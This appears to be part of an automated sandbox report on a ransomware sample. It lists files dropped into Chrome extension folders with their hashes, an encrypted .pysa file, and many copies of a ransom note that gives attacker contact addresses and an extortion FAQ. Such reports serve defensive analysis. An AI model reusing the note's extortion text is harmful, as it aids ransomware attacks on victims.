                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.154784572803144
                  Encrypted:false
                  SSDEEP:96:2dp3hqRwKp5gP5UY+c+KjE0AYUA9ah1+Jd0cBfWstx1C0hZuw7aQN:23CprctE0WAPd9BPth6wl
                  MD5:2F068562F2ADF92F005A5D5456664551
                  SHA1:6975DE7DCD25A1163DC0CE94E99A44B28481F294
                  SHA-256:BB524F92146064C8199EEE9D86D42E8687FAC36FF9BCE88D61FB47A8D321EF00
                  SHA-512:CF34267824D8AD57AED7812A1E387835504F288B2049CCE3CC97E92544F46E67A31FB2DF8B318D73FF3DE15A84B6412F966CF04CCCF3BE6C2144435C398311C7
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_GB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_US\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\et\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fi\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fr\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\he\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hi\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hu\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\id\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\it\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ja\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ko\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lt\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lv\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ms\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\nl\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\no\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pl\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_BR\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_PT\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ro\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ru\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
